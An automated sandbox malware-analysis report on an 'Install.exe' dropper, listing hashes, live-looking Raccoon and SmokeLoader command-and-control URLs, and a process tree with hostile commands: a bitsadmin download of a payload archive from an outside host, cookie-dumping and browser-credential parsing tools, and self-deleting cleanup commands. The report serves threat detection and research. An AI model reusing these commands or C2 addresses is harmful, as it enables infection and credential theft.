Resubmissions

08-07-2021 12:18

210708-8z6d5h8z2n 10

06-07-2021 17:53

210706-g6we6sa7sa 10

19-06-2021 18:17

210619-vr8bj2dzfn 10

17-06-2021 21:39

210617-a9cvlnmrbx 10

11-06-2021 17:26

210611-wvab1yw2tj 10

08-06-2021 06:47

210608-qrbpch3y46 10

08-06-2021 06:47

210608-64tndgm1ln 10

05-06-2021 18:40

210605-cd6qpr55sx 10

04-06-2021 11:56

210604-5c416rs3ns 10

04-06-2021 08:52

210604-jy9885jen2 10

Analysis

  • max time kernel
    1801s
  • max time network
    1630s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    04-05-2021 14:36

General

  • Target

    Install.exe

  • Size

    497KB

  • MD5

    41a5f4fd1ea7cac4aa94a87aebccfef0

  • SHA1

    0d0abf079413a4c773754bf4fda338dc5b9a8ddc

  • SHA256

    97e95e99fd499ec45a7c1d8683d5731ce5e7a8fb8b710622e578cd169a00d8d9

  • SHA512

    5ca14bda498f26efff4e1179969b8f2c25244063c7bf25f3ec20b5cd24b5be320bbfb8b3d0b2d66f5c5b415da777a766fece5f251a4247773c6cb991417fb75f

Malware Config

Extracted

Family

raccoon

Botnet

9afb493c6f82d08075dbbfa7d93ce97f1dbf4733

Attributes
  • url4cnc

    https://tttttt.me/antitantief3

rc4.plain
rc4.plain

Extracted

Family

smokeloader

Version

2020

C2

http://999080321newfolder1002002131-service1002.space/

http://999080321newfolder1002002231-service1002.space/

http://999080321newfolder3100231-service1002.space/

http://999080321newfolder1002002431-service1002.space/

http://999080321newfolder1002002531-service1002.space/

http://999080321newfolder33417-012425999080321.space/

http://999080321test125831-service10020125999080321.space/

http://999080321test136831-service10020125999080321.space/

http://999080321test147831-service10020125999080321.space/

http://999080321test146831-service10020125999080321.space/

http://999080321test134831-service10020125999080321.space/

http://999080321est213531-service1002012425999080321.ru/

http://999080321yes1t3481-service10020125999080321.ru/

http://999080321test13561-service10020125999080321.su/

http://999080321test14781-service10020125999080321.info/

http://999080321test13461-service10020125999080321.net/

http://999080321test15671-service10020125999080321.tech/

http://999080321test12671-service10020125999080321.online/

http://999080321utest1341-service10020125999080321.ru/

http://999080321uest71-service100201dom25999080321.ru/

rc4.i32
rc4.i32

Signatures

  • PlugX

    PlugX is a RAT (Remote Access Trojan) that has been around since 2008.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • TelegramRat 1 IoCs

    Telegram_rat.

  • Turns off Windows Defender SpyNet reporting 2 TTPs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Windows security bypass 2 TTPs
  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 55 IoCs
  • UPX packed file 4 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 64 IoCs
  • Reads local data of messenger clients 2 TTPs

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 12 IoCs
  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks for any installed AV software in registry 1 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Enumerates connected drives 3 TTPs 48 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 21 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 26 IoCs
  • Suspicious use of SetThreadContext 7 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 36 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 13 IoCs
  • Checks SCSI registry key(s) 3 TTPs 24 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 3 IoCs
  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Kills process with taskkill 3 IoCs
  • Modifies Internet Explorer settings 1 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 37 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 9 IoCs
  • Runs ping.exe 1 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 48 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 10 IoCs
  • Suspicious use of SetWindowsHookEx 9 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s WpnService
    1⤵
      PID:2724
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
      1⤵
      • Modifies registry class
      PID:2712
    • C:\Users\Admin\AppData\Local\Temp\Install.exe
      "C:\Users\Admin\AppData\Local\Temp\Install.exe"
      1⤵
      • Suspicious use of WriteProcessMemory
      PID:4056
      • C:\Users\Admin\AppData\Local\Temp\is-0CN2S.tmp\Install.tmp
        "C:\Users\Admin\AppData\Local\Temp\is-0CN2S.tmp\Install.tmp" /SL5="$40078,235791,152064,C:\Users\Admin\AppData\Local\Temp\Install.exe"
        2⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:3204
        • C:\Users\Admin\AppData\Local\Temp\is-NJKGP.tmp\Ultra.exe
          "C:\Users\Admin\AppData\Local\Temp\is-NJKGP.tmp\Ultra.exe" /S /UID=burnerch1
          3⤵
          • Drops file in Drivers directory
          • Executes dropped EXE
          • Adds Run key to start application
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:360
          • C:\Program Files\Common Files\UUUJKLOPTG\ultramediaburner.exe
            "C:\Program Files\Common Files\UUUJKLOPTG\ultramediaburner.exe" /VERYSILENT
            4⤵
            • Executes dropped EXE
            • Suspicious use of WriteProcessMemory
            PID:3816
            • C:\Users\Admin\AppData\Local\Temp\is-68ATF.tmp\ultramediaburner.tmp
              "C:\Users\Admin\AppData\Local\Temp\is-68ATF.tmp\ultramediaburner.tmp" /SL5="$60038,281924,62464,C:\Program Files\Common Files\UUUJKLOPTG\ultramediaburner.exe" /VERYSILENT
              5⤵
              • Executes dropped EXE
              • Drops file in Program Files directory
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of FindShellTrayWindow
              • Suspicious use of WriteProcessMemory
              PID:196
              • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                6⤵
                • Executes dropped EXE
                PID:3932
          • C:\Users\Admin\AppData\Local\Temp\d6-44dbe-2e0-4c98f-8b320f2807fe3\Qygaefuxashi.exe
            "C:\Users\Admin\AppData\Local\Temp\d6-44dbe-2e0-4c98f-8b320f2807fe3\Qygaefuxashi.exe"
            4⤵
            • Executes dropped EXE
            • Checks computer location settings
            • Modifies system certificate store
            • Suspicious use of AdjustPrivilegeToken
            PID:1172
          • C:\Users\Admin\AppData\Local\Temp\2c-30d94-59e-53d92-6097ea22d25e7\Pajaexishotu.exe
            "C:\Users\Admin\AppData\Local\Temp\2c-30d94-59e-53d92-6097ea22d25e7\Pajaexishotu.exe"
            4⤵
            • Executes dropped EXE
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:1556
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\axgso0sp.ytf\KiffMainE1.exe & exit
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:5212
              • C:\Users\Admin\AppData\Local\Temp\axgso0sp.ytf\KiffMainE1.exe
                C:\Users\Admin\AppData\Local\Temp\axgso0sp.ytf\KiffMainE1.exe
                6⤵
                • Executes dropped EXE
                • Suspicious use of AdjustPrivilegeToken
                PID:5388
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\naagdcms.li3\001.exe & exit
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:5492
              • C:\Users\Admin\AppData\Local\Temp\naagdcms.li3\001.exe
                C:\Users\Admin\AppData\Local\Temp\naagdcms.li3\001.exe
                6⤵
                • Executes dropped EXE
                PID:5752
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\x205laef.ihs\installer.exe /qn CAMPAIGN="654" & exit
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:5652
              • C:\Users\Admin\AppData\Local\Temp\x205laef.ihs\installer.exe
                C:\Users\Admin\AppData\Local\Temp\x205laef.ihs\installer.exe /qn CAMPAIGN="654"
                6⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Enumerates connected drives
                • Modifies system certificate store
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of FindShellTrayWindow
                PID:5936
                • C:\Windows\SysWOW64\msiexec.exe
                  "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Yonatan.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\x205laef.ihs\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\x205laef.ihs\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1619879513 /qn CAMPAIGN=""654"" " CAMPAIGN="654"
                  7⤵
                    PID:3532
              • C:\Windows\System32\cmd.exe
                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\3hv1o003.ifs\gpooe.exe & exit
                5⤵
                • Suspicious use of WriteProcessMemory
                PID:6116
                • C:\Users\Admin\AppData\Local\Temp\3hv1o003.ifs\gpooe.exe
                  C:\Users\Admin\AppData\Local\Temp\3hv1o003.ifs\gpooe.exe
                  6⤵
                  • Executes dropped EXE
                  • Adds Run key to start application
                  • Suspicious use of WriteProcessMemory
                  PID:4388
                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                    7⤵
                    • Executes dropped EXE
                    PID:4504
                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                    7⤵
                    • Executes dropped EXE
                    PID:4884
                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                    7⤵
                    • Executes dropped EXE
                    PID:6420
                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                    7⤵
                    • Executes dropped EXE
                    PID:4792
              • C:\Windows\System32\cmd.exe
                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\rvdq2y2y.owp\google-game.exe & exit
                5⤵
                • Suspicious use of WriteProcessMemory
                PID:4892
                • C:\Users\Admin\AppData\Local\Temp\rvdq2y2y.owp\google-game.exe
                  C:\Users\Admin\AppData\Local\Temp\rvdq2y2y.owp\google-game.exe
                  6⤵
                  • Executes dropped EXE
                  • Suspicious use of SetWindowsHookEx
                  • Suspicious use of WriteProcessMemory
                  PID:4984
                  • C:\Windows\SysWOW64\rundll32.exe
                    "C:\Windows\System32\rundll32.exe" "C:\Users\Admin\AppData\Local\Temp\install.dll",install
                    7⤵
                      PID:5140
                • C:\Windows\System32\cmd.exe
                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\org4srrx.ith\y1.exe & exit
                  5⤵
                    PID:5640
                    • C:\Users\Admin\AppData\Local\Temp\org4srrx.ith\y1.exe
                      C:\Users\Admin\AppData\Local\Temp\org4srrx.ith\y1.exe
                      6⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      PID:4684
                      • C:\Users\Admin\AppData\Local\Temp\zR3cQuH6KX.exe
                        "C:\Users\Admin\AppData\Local\Temp\zR3cQuH6KX.exe"
                        7⤵
                        • Executes dropped EXE
                        • Modifies system certificate store
                        PID:6344
                        • C:\Users\Admin\AppData\Roaming\1620138845772.exe
                          "C:\Users\Admin\AppData\Roaming\1620138845772.exe" /sjson "C:\Users\Admin\AppData\Roaming\1620138845772.txt"
                          8⤵
                          • Executes dropped EXE
                          PID:6848
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\zR3cQuH6KX.exe"
                          8⤵
                            PID:7124
                            • C:\Windows\SysWOW64\PING.EXE
                              ping 127.0.0.1 -n 3
                              9⤵
                              • Runs ping.exe
                              PID:6188
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\org4srrx.ith\y1.exe"
                          7⤵
                            PID:6448
                            • C:\Windows\SysWOW64\timeout.exe
                              timeout /T 10 /NOBREAK
                              8⤵
                              • Delays execution with timeout.exe
                              PID:6664
                      • C:\Windows\System32\cmd.exe
                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ebi35omd.z2u\askinstall39.exe & exit
                        5⤵
                          PID:4396
                          • C:\Users\Admin\AppData\Local\Temp\ebi35omd.z2u\askinstall39.exe
                            C:\Users\Admin\AppData\Local\Temp\ebi35omd.z2u\askinstall39.exe
                            6⤵
                            • Executes dropped EXE
                            PID:5332
                            • C:\Windows\SysWOW64\cmd.exe
                              cmd.exe /c taskkill /f /im chrome.exe
                              7⤵
                                PID:6512
                                • C:\Windows\SysWOW64\taskkill.exe
                                  taskkill /f /im chrome.exe
                                  8⤵
                                  • Kills process with taskkill
                                  PID:6708
                          • C:\Windows\System32\cmd.exe
                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\li3h55by.hpl\setup.exe & exit
                            5⤵
                              PID:5928
                              • C:\Users\Admin\AppData\Local\Temp\li3h55by.hpl\setup.exe
                                C:\Users\Admin\AppData\Local\Temp\li3h55by.hpl\setup.exe
                                6⤵
                                • Executes dropped EXE
                                PID:5052
                                • C:\Windows\SysWOW64\cmd.exe
                                  cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\li3h55by.hpl\setup.exe"
                                  7⤵
                                    PID:6068
                                    • C:\Windows\SysWOW64\PING.EXE
                                      ping 1.1.1.1 -n 1 -w 3000
                                      8⤵
                                      • Runs ping.exe
                                      PID:1188
                              • C:\Windows\System32\cmd.exe
                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\l0xpwz5g.4tc\request2.exe & exit
                                5⤵
                                  PID:4692
                                  • C:\Users\Admin\AppData\Local\Temp\l0xpwz5g.4tc\request2.exe
                                    C:\Users\Admin\AppData\Local\Temp\l0xpwz5g.4tc\request2.exe
                                    6⤵
                                    • Executes dropped EXE
                                    PID:4912
                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\main.exe
                                      "C:\Users\Admin\AppData\Local\Temp\RarSFX0\main.exe"
                                      7⤵
                                      • Executes dropped EXE
                                      • Loads dropped DLL
                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                      PID:648
                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\parse.exe
                                        parse.exe -f json -b firefox
                                        8⤵
                                        • Executes dropped EXE
                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                        PID:5360
                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\parse.exe
                                        parse.exe -f json -b chrome
                                        8⤵
                                          PID:6468
                                        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\parse.exe
                                          parse.exe -f json -b edge
                                          8⤵
                                          • Executes dropped EXE
                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                          PID:4136
                                  • C:\Windows\System32\cmd.exe
                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xaytjruz.w5t\SunLabsPlayer.exe /S & exit
                                    5⤵
                                      PID:5012
                                      • C:\Users\Admin\AppData\Local\Temp\xaytjruz.w5t\SunLabsPlayer.exe
                                        C:\Users\Admin\AppData\Local\Temp\xaytjruz.w5t\SunLabsPlayer.exe /S
                                        6⤵
                                        • Executes dropped EXE
                                        • Loads dropped DLL
                                        • Drops file in Program Files directory
                                        PID:4656
                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsqC730.tmp\tempfile.ps1"
                                          7⤵
                                            PID:6460
                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsqC730.tmp\tempfile.ps1"
                                            7⤵
                                              PID:5036
                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsqC730.tmp\tempfile.ps1"
                                              7⤵
                                                PID:5868
                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsqC730.tmp\tempfile.ps1"
                                                7⤵
                                                  PID:6712
                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsqC730.tmp\tempfile.ps1"
                                                  7⤵
                                                    PID:3160
                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsqC730.tmp\tempfile.ps1"
                                                    7⤵
                                                      PID:6988
                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsqC730.tmp\tempfile.ps1"
                                                      7⤵
                                                      • Checks for any installed AV software in registry
                                                      PID:7100
                                                    • C:\Windows\SysWOW64\bitsadmin.exe
                                                      "bitsadmin" /Transfer helper http://sunlabsinternational.com/data/data.7z C:\zip.7z
                                                      7⤵
                                                      • Download via BitsAdmin
                                                      PID:4808
                                                      • C:\Windows\System32\Conhost.exe
                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        8⤵
                                                        • Loads dropped DLL
                                                        • Suspicious use of WriteProcessMemory
                                                        PID:5140
                                                    • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                      "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pfGNXVQDAS5gsjBB -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                      7⤵
                                                      • Executes dropped EXE
                                                      • Drops file in Program Files directory
                                                      PID:5600
                                                    • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                      "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pqoEjL4JJuJeAe4u -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                      7⤵
                                                      • Executes dropped EXE
                                                      PID:6844
                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsqC730.tmp\tempfile.ps1"
                                                      7⤵
                                                        PID:5932
                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsqC730.tmp\tempfile.ps1"
                                                        7⤵
                                                          PID:5000
                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsqC730.tmp\tempfile.ps1"
                                                          7⤵
                                                            PID:4704
                                                            • C:\Windows\System32\Conhost.exe
                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              8⤵
                                                                PID:5928
                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsqC730.tmp\tempfile.ps1"
                                                              7⤵
                                                                PID:5064
                                                                • C:\Windows\System32\Conhost.exe
                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  8⤵
                                                                  • Loads dropped DLL
                                                                  PID:4996
                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsqC730.tmp\tempfile.ps1"
                                                                7⤵
                                                                  PID:7008
                                                                • C:\Windows\SysWOW64\rundll32.exe
                                                                  C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\ogdtzM\ogdtzM.dll" ogdtzM
                                                                  7⤵
                                                                  • Loads dropped DLL
                                                                  PID:5536
                                                                  • C:\Windows\system32\rundll32.exe
                                                                    C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\ogdtzM\ogdtzM.dll" ogdtzM
                                                                    8⤵
                                                                    • Loads dropped DLL
                                                                    • Drops file in System32 directory
                                                                    PID:5232
                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsqC730.tmp\tempfile.ps1"
                                                                  7⤵
                                                                    PID:4524
                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsqC730.tmp\tempfile.ps1"
                                                                    7⤵
                                                                      PID:6504
                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsqC730.tmp\tempfile.ps1"
                                                                      7⤵
                                                                        PID:1552
                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsqC730.tmp\tempfile.ps1"
                                                                        7⤵
                                                                          PID:4816
                                                                          • C:\Windows\System32\Conhost.exe
                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                            8⤵
                                                                              PID:4164
                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsqC730.tmp\tempfile.ps1"
                                                                            7⤵
                                                                              PID:4832
                                                                            • C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe
                                                                              "C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT
                                                                              7⤵
                                                                              • Executes dropped EXE
                                                                              PID:4808
                                                                        • C:\Windows\System32\cmd.exe
                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\dy0y0gem.dd5\005.exe & exit
                                                                          5⤵
                                                                            PID:2344
                                                                            • C:\Users\Admin\AppData\Local\Temp\dy0y0gem.dd5\005.exe
                                                                              C:\Users\Admin\AppData\Local\Temp\dy0y0gem.dd5\005.exe
                                                                              6⤵
                                                                              • Executes dropped EXE
                                                                              PID:3516
                                                                          • C:\Windows\System32\cmd.exe
                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\esu5gnmr.vhr\ifhwwyy.exe & exit
                                                                            5⤵
                                                                              PID:4108
                                                                              • C:\Users\Admin\AppData\Local\Temp\esu5gnmr.vhr\ifhwwyy.exe
                                                                                C:\Users\Admin\AppData\Local\Temp\esu5gnmr.vhr\ifhwwyy.exe
                                                                                6⤵
                                                                                • Executes dropped EXE
                                                                                PID:4856
                                                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                  7⤵
                                                                                  • Executes dropped EXE
                                                                                  PID:6176
                                                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                  7⤵
                                                                                  • Executes dropped EXE
                                                                                  PID:6824
                                                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                  7⤵
                                                                                  • Executes dropped EXE
                                                                                  PID:6812
                                                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                  7⤵
                                                                                  • Executes dropped EXE
                                                                                  PID:5428
                                                                            • C:\Windows\System32\cmd.exe
                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\kxuwgbo0.xyj\toolspab1.exe & exit
                                                                              5⤵
                                                                                PID:5360
                                                                                • C:\Users\Admin\AppData\Local\Temp\kxuwgbo0.xyj\toolspab1.exe
                                                                                  C:\Users\Admin\AppData\Local\Temp\kxuwgbo0.xyj\toolspab1.exe
                                                                                  6⤵
                                                                                  • Executes dropped EXE
                                                                                  • Suspicious use of SetThreadContext
                                                                                  PID:5412
                                                                                  • C:\Users\Admin\AppData\Local\Temp\kxuwgbo0.xyj\toolspab1.exe
                                                                                    C:\Users\Admin\AppData\Local\Temp\kxuwgbo0.xyj\toolspab1.exe
                                                                                    7⤵
                                                                                    • Executes dropped EXE
                                                                                    • Loads dropped DLL
                                                                                    • Checks SCSI registry key(s)
                                                                                    • Suspicious behavior: MapViewOfSection
                                                                                    PID:6332
                                                                              • C:\Windows\System32\cmd.exe
                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\qt5bawc1.vpu\GcleanerWW.exe /mixone & exit
                                                                                5⤵
                                                                                  PID:4384
                                                                                • C:\Windows\System32\cmd.exe
                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5ucafg1h.oug\42a25820.exe & exit
                                                                                  5⤵
                                                                                    PID:2344
                                                                                    • C:\Users\Admin\AppData\Local\Temp\5ucafg1h.oug\42a25820.exe
                                                                                      C:\Users\Admin\AppData\Local\Temp\5ucafg1h.oug\42a25820.exe
                                                                                      6⤵
                                                                                      • Executes dropped EXE
                                                                                      • Loads dropped DLL
                                                                                      • Checks SCSI registry key(s)
                                                                                      • Suspicious behavior: MapViewOfSection
                                                                                      PID:6360
                                                                          • c:\windows\system32\svchost.exe
                                                                            c:\windows\system32\svchost.exe -k netsvcs -s Browser
                                                                            1⤵
                                                                              PID:2604
                                                                            • c:\windows\system32\svchost.exe
                                                                              c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
                                                                              1⤵
                                                                                PID:2380
                                                                              • c:\windows\system32\svchost.exe
                                                                                c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
                                                                                1⤵
                                                                                  PID:2368
                                                                                • c:\windows\system32\svchost.exe
                                                                                  c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
                                                                                  1⤵
                                                                                    PID:1924
                                                                                  • c:\windows\system32\svchost.exe
                                                                                    c:\windows\system32\svchost.exe -k netsvcs -s SENS
                                                                                    1⤵
                                                                                      PID:1380
                                                                                    • c:\windows\system32\svchost.exe
